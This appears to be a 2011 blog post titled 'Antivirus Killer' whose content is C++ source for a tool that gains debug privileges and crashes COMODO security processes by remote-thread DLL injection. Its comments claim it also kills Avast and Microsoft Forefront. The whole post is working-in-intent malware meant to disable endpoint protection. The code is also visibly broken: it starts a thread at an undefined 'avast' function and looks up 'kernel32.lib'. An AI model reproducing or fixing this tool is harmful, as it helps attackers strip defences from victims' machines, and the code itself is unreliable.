//Kills COMODO, Avast and Micro$oft Frorefront
//crashes a target process by attempting to inject a dll without enough space allocated for DLL's name
//Code snippets taken from Blizzhackers.cc and Rohitab
//THX to Napalm,magnetisk, and Nihil² for letting me "borrow" your code
//Put together by Cpu_hacker666
//Yes, I IZ A CODE MONKEY XD
#include <iostream>
#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#define dll_name "lol"//Madeup DLL name, SHOULD NOT EXIST
using namespace std;
bool CrashProcess(DWORD procid);
void COMODO();
unsigned long GetProcID(const char *process);
BOOL EnablePriv(LPCSTR lpszPriv); // by Napalm
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)
{
EnablePriv( SE_DEBUG_NAME );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&avast, 0, 0, NULL);
while(1)
{
Sleep(1);
}
return 0;
}
bool CrashProcess(DWORD procid) //Based off magnetisk's poorly written code
{
if(!procid)
{
return FALSE;
}
HANDLE hd;
LPVOID gp,rs;
gp = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.lib"),"LoadLibraryA");
hd = OpenProcess(PROCESS_ALL_ACCESS,FALSE,procid);
rs = (LPVOID)VirtualAllocEx(hd, NULL, strlen(dll_name), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hd, (LPVOID)rs, dll_name,strlen(dll_name), NULL);
CreateRemoteThread(hd,NULL,0,(LPTHREAD_START_ROUTINE)gp,(LPVOID)rs,0,0);
return TRUE;
}
unsigned long GetProcID(const char *process) //by Nihil²
{
PROCESSENTRY32 pe = {0};
HANDLE thSnapshot = {0};
BOOL retval = false;
thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(thSnapshot == INVALID_HANDLE_VALUE)
{
MessageBox(NULL, "Error: Unable to create toolhelp snapshot!", "Loader", MB_ICONERROR);
return 0;
}
pe.dwSize = sizeof(PROCESSENTRY32);
retval = Process32First(thSnapshot, &pe);
while(retval)
{
if(StrStrI(pe.szExeFile, process))
{
return pe.th32ProcessID;
}
retval = Process32Next(thSnapshot,&pe);
}
return 0;
}
BOOL EnablePriv(LPCSTR lpszPriv) // by Napalm
{
HANDLE hToken;
LUID luid;
TOKEN_PRIVILEGES tkprivs;
ZeroMemory(&tkprivs, sizeof(tkprivs));
if(!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken))
return FALSE;
if(!LookupPrivilegeValue(NULL, lpszPriv, &luid)){
CloseHandle(hToken); return FALSE;
}
tkprivs.PrivilegeCount = 1;
tkprivs.Privileges[0].Luid = luid;
tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);
CloseHandle(hToken);
return bRet;
}
void COMODO()
{
while(1)
{
if(GetProcID("cfp.exe"))
CrashProcess(GetProcID("cfp.exe"));
if(GetProcID("cfplogvw.exe"))
CrashProcess(GetProcID("cfplogvw.exe"));
if(GetProcID("cavscan.exe"))
CrashProcess(GetProcID("cavscan.exe"));
if(GetProcID("cfpupdat.exe"))
CrashProcess(GetProcID("cfpupdat.exe"));
if(GetProcID("cmdagent.exe"))
CrashProcess(GetProcID("cmdagent.exe"));
if(GetProcID("crashrep.exe"))
CrashProcess(GetProcID("crashrep.exe"));
Sleep(100);
}
}
Thursday, August 11, 2011
Antivirus Killer
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment